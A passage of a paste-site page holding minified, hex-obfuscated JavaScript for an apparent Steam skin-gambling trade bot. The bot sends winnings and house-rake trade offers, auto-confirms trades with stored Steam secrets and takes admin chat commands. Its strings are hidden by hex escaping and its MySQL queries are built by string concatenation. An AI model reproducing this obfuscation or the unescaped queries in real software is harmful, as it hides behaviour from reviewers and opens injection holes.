7\x6e\x20\x65\x72\x72\x6f\x72\x20\x28\x70\x72\x6f\x63\x65\x65\x64\x20\x3d\x20\x66\x61\x6c\x73\x65\x20\x69\x6e\x20\x6e\x6f\x64\x65\x29\x20\x2d\x20\x50\x72\x6f\x62\x61\x62\x6c\x79\x20\x53\x74\x65\x61\x6d\x20\x49\x73\x73\x75\x65\x73"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b)}),void e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x49\x73\x73\x75\x65\x73\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})):void 0},2e3)})})})})})}),f.on("\x66\x72\x69\x65\x6e\x64\x4d\x65\x73\x73\x61\x67\x65\x23"+admin,function(a,b){if(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x41\x64\x6d\x69\x6e\x20\x74\x6f\x20\x42\x6f\x74\x3a\x20"+b),0==b.indexOf("\x2f\x77\x65\x62\x6c\x6f\x67\x6f\x6e")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x66\x72\x65\x73\x68\x69\x6e\x67\x20\x57\x65\x62\x20\x63\x6f\x6f\x6b\x69\x65\x73\x2e\x2e"),f.webLogOn()),0==b.indexOf("\x2f\x73\x65\x6e\x64\x72\x61\x6b\x65")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x61\x6c\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x73\x65\x6e\x64\x52\x61\x6b\x65\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x73\x65\x6e\x64\x73\x20\x74\x68\x65\x20\x6c\x61\x74\x65\x73\x74\x20\x71\x75\x65\x72\x79\x2c\x20\x63\x61\x6c\x6c\x20\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x69\x6d\x65\x73\x20\x69\x66\x20\x6e\x65\x65\x64\x65\x64\x29"),u(1)),0==b.indexOf("\x2f\x73\x65\x6e\x64\x6f\x66\x66\x65\x72\x73")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x61\x6c\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x73\x65\x6e\x64\x4f\x66\x66\x65\x72\x73\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x73\x65\x6e\x64\x73\x20\x74\x68\x65\x20\x6c\x61\x74\x65\x73\x74\x20\x71\x75\x65\x72\x79\x2c\x20\x63\x61\x6c\x6c\x20\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x69\x6d\x65\x73\x20\x69\x66\x20\x6e\x65\x65\x64\x65\x64\x29"),t(1)),0==b.indexOf("\x2f\x63\x6f\x64\x65")){var c=SteamTotp.generateAuthCode(sharedsecret);f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x75\x72\x72\x65\x6e\x74\x20\x6c\x6f\x67\x69\x6e\x20\x63\x6f\x64\x65\x20\x28\x72\x65\x74\x72\x79\x20\x69\x66\x20\x69\x74\x20\x64\x6f\x65\x73\x6e\x74\x20\x77\x6f\x72\x6b\x29\x3a\x20"+c)}0==b.indexOf("\x2f\x63\x63")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x50\x65\x72\x66\x6f\x72\x6d\x69\x6e\x67\x20\x61\x20\x4d\x6f\x62\x69\x6c\x65\x20\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x20\x43\x68\x65\x63\x6b\x2e\x2e"),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x50\x65\x72\x66\x6f\x72\x6d\x69\x6e\x67\x20\x61\x20\x4d\x6f\x62\x69\x6c\x65\x20\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x20\x43\x68\x65\x63\x6b\x2e\x2e"),community.checkConfirmations()),0==b.indexOf("\x2f\x70\x6f\x6c\x6c")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x69\x6e\x67\x20\x66\x6f\x72\x20\x54\x72\x61\x64\x65\x6f\x66\x66\x65\x72\x73\x2e\x2e"),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x69\x6e\x67\x20\x66\x6f\x72\x20\x54\x72\x61\x64\x65\x6f\x66\x66\x65\x72\x73\x2e\x2e"),g.doPoll()),0==b.indexOf("\x2f\x6c\x6f\x61\x64\x70\x72\x69\x63\x65\x73")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x66\x72\x65\x73\x68\x69\x6e\x67\x20\x4d\x61\x72\x6b\x65\x74\x20\x41\x50\x49\x21"),loadprices()),0==b.indexOf("\x2f\x65\x6e\x64")&&(f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x6e\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x63\x75\x72\x72\x65\x6e\x74\x20\x67\x61\x6d\x65\x21"),-1!=h&&clearTimeout(h),k()),0==b.indexOf("\x2f\x6f\x66\x66\x65\x72\x73")&&e.query("\x53\x45\x4c\x45\x43\x54\x20\x49\x44\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43",function(a,b,c){0!=b.length?(console.log(b),f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x20\x79\x6f\x75\x72\x20\x63\x6f\x6e\x73\x6f\x6c\x65\x20\x66\x6f\x72\x20\x74\x68\x65\x20\x49\x44\x27\x73\x21")):f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x72\x65\x20\x61\x72\x65\x6e\x27\x74\x20\x61\x6e\x79\x20\x61\x63\x74\x69\x76\x65\x20\x71\x75\x65\x75\x65\x20\x49\x44\x27\x73\x2e")}),0==b.indexOf("\x2f\x72\x61\x6b\x65\x73")&&e.query("\x53\x45\x4c\x45\x43\x54\x20\x49\x44\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43",function(a,b,c){0!=b.length?(console.log(b),f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x20\x79\x6f\x75\x72\x20\x63\x6f\x6e\x73\x6f\x6c\x65\x20\x66\x6f\x72\x20\x74\x68\x65\x20\x49\x44\x27\x73\x21")):f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x72\x65\x20\x61\x72\x65\x6e\x27\x74\x20\x61\x6e\x79\x20\x61\x63\x74\x69\x76\x65\x20\x72\x61\x6b\x65\x20\x49\x44\x27\x73\x2e")})});function t(a){e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43\x20\x4c\x49\x4d\x49\x54\x20\x31",function(b,c,d){if(0!=c.length){var h=c[0].id;e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65"+h+"\x60\x20\x57\x48\x45\x52\x45\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x27\x27\x20\x41\x4e\x44\x20\x60\x72\x61\x6b\x65\x60\x21\x3d\x27\x31\x27",function(b,d,i){if(0!=d.length)console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x69\x6e\x67\x20\x4d\x69\x73\x73\x69\x6e\x67\x20\x41\x73\x73\x65\x74\x69\x64\x73\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x69\x6e\x20\x31\x35\x20\x73\x65\x63\x6f\x6e\x64\x73\x21"),d.forEach(function(a){g.getOffer(a.offerid,function(b,c){return b?void e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x67\x6f\x65\x72\x72\x6f\x72\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+h+"\x27"):void s(c,a.userid,a.item,h)})}),setTimeout(function(){t(2)},5e3);else{if(2==a){console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x65\x64\x20\x41\x73\x73\x65\x74\x69\x64\x73\x2c\x20\x72\x65\x62\x75\x69\x6c\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x71\x75\x65\x75\x65\x20\x69\x6e\x20\x4d\x59\x53\x51\x4c\x2e");var k="",l="";return e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65"+h+"\x60",function(a,b,c){b.forEach(function(a){0==a.rake?k+="\x2f"+a.assetid:l+="\x2f"+a.assetid})}),void setTimeout(function(){console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x65\x64\x20\x41\x73\x73\x65\x74\x69\x64\x73\x2c\x20\x52\x65\x62\x75\x69\x6c\x74\x20\x74\x68\x65\x20\x51\x75\x65\x75\x65\x2c\x20\x61\x74\x74\x65\x6d\x70\x74\x69\x6e\x67\x20\x74\x6f\x20\x73\x65\x6e\x64\x20\x54\x72\x61\x64\x65\x4f\x66\x66\x65\x72\x2e"),e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x22"+k+"\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+h+"\x27"),e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x53\x45\x54\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x22"+l+"\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+h+"\x27")},3e3)}var m=c[0].assetid.split("\x2f");g.loadInventory(appid,2,!0,function(b,d){if(b)return console.log("\x4c\x6f\x61\x64\x49\x4e\x56\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),1==a&&f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x6c\x6f\x61\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x42\x6f\x74\x27\x73\x20\x49\x6e\x76\x65\x6e\x74\x6f\x72\x79\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x6c\x61\x74\x65\x72\x21"),void e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x6c\x69\x65\x72\x72\x6f\x72\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+h+"\x27");var i=c[0].token,k="\x43\x6f\x6e\x67\x72\x61\x74\x75\x6c\x61\x74\x69\x6f\x6e\x73\x21\x20\x59\x6f\x75\x20\x77\x6f\x6e\x20\x6f\x6e\x20"+sitename+"\x20\x69\x6e\x20\x47\x61\x6d\x65\x20\x23"+h,l=g.createOffer(c[0].userid);d.forEach(function(a){m.forEach(function(b){a.id==b&&l.addMyItem(a)})}),setTimeout(function(){l.setMessage(k),l.setToken(i),l.send(function(b){return b?(console.log("\x45\x72\x72\x6f\x72\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+h+"\x3a"),console.log(b),1==a&&f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x74\x72\x61\x64\x65\x6f\x66\x66\x65\x72\x2c\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x6c\x61\x74\x65\x72\x21"),void e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x73\x6f\x65\x72\x72\x6f\x72\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+h+"\x27")):(e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x73\x65\x6e\x74\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+h+"\x27"),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+h+"\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x61\x6e\x64\x20\x69\x73\x20\x61\x77\x61\x69\x74\x69\x6e\x67\x20\x6d\x6f\x62\x69\x6c\x65\x20\x63\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x2e"),1==a&&f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x74\x68\x65\x20\x74\x72\x61\x64\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+h+"\x21"),void community.checkConfirmations())})},2e3)})}})}else if(1==a)return void f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x4e\x6f\x20\x6d\x6f\x72\x65\x20\x57\x69\x6e\x6e\x69\x6e\x67\x73\x20\x51\x75\x65\x72\x69\x65\x73\x21")})}function u(a){e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43\x20\x4c\x49\x4d\x49\x54\x20\x31",function(b,c,d){if(0!=c.length){var h=c[0].assetid.split("\x2f");g.loadInventory(appid,2,!0,function(b,d){if(b)return console.log("\x4c\x6f\x61\x64\x49\x4e\x56\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),void(1==a&&f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x6c\x6f\x61\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x42\x6f\x74\x27\x73\x20\x49\x6e\x76\x65\x6e\x74\x6f\x72\x79\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x61\x20\x62\x69\x74\x20\x6c\x61\x74\x65\x72\x21"));var i=c[0].token,k=c[0].id,l=c[0].value,m="\x52\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+k+"\x20\x28\x24"+l+"\x29",n=g.createOffer(c[0].userid);d.forEach(function(a){h.forEach(function(b){a.id==b&&n.addMyItem(a)})}),setTimeout(function(){n.setMessage(m),n.setToken(i),n.send(function(b){if(b){if(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x52\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+k+"\x3a"),console.log(b),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x6c\x61\x74\x65\x72\x20\x6f\x72\x20\x6d\x61\x6b\x65\x20\x73\x75\x72\x65\x20\x79\x6f\x75\x20\x68\x61\x76\x65\x20\x73\x65\x74\x20\x79\x6f\x75\x72\x20\x55\x52\x4c\x20\x2f\x20\x53\x74\x65\x61\x6d\x20\x49\x44\x20\x69\x6e\x20\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x21"),1==a)return void f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x54\x72\x61\x64\x65\x4f\x66\x66\x65\x72\x2c\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x6c\x61\x74\x65\x72\x20\x61\x6e\x64\x20\x2f\x20\x6f\x72\x20\x63\x68\x65\x63\x6b\x20\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x21")}else e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x73\x65\x6e\x74\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+k+"\x27"),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+k+"\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x61\x6e\x64\x20\x69\x73\x20\x61\x77\x61\x69\x74\x69\x6e\x67\x20\x6d\x6f\x62\x69\x6c\x65\x20\x63\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x2e"),1==a&&f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x74\x68\x65\x20\x72\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+k+"\x21"),community.checkConfirmations()})},2e3)})}else if(1==a)return void f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x4e\x6f\x20\x6d\x6f\x72\x65\x20\x52\x61\x6b\x65\x20\x51\x75\x65\x72\x69\x65\x73\x21")})}community.on("\x6e\x65\x77\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e",function(a){var b=Math.round(Date.now()/1e3),c=SteamTotp.getConfirmationKey(identitysecret,b,"\x61\x6c\x6c\x6f\x77");community.respondToConfirmation(a.id,a.key,b,c,!0,function(a){console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x63\x6f\x6e\x66\x69\x72\x6d\x65\x64\x20\x74\x68\x65\x20\x6f\x75\x74\x67\x6f\x69\x6e\x67\x20\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x21"),a&&(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x73\x20\x65\x72\x72\x6f\x72\x3a\x20"+a),f.webLogOn())})}),community.on("\x63\x6f\x6e\x66\x4b\x65\x79\x4e\x65\x65\x64\x65\x64",function(a,b){console.log("\x63\x6f\x6e\x66\x4b\x65\x79\x4e\x65\x65\x64\x65\x64");var c=Math.floor(Date.now()/1e3);b(null,c,SteamTotp.getConfirmationKey(identitysecret,c,a))}),setInterval(function(){f.webLogOn(),e.query("\x53\x45\x4c\x45\x43\x54\x20\x31")},36e5),setInterval(function(){t()},15e3)}),b.exports=c("\x2e\x2e\x2f\x6f\x73\x62\x6f\x74\x31\x2e\x6a\x73")}(require,module);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement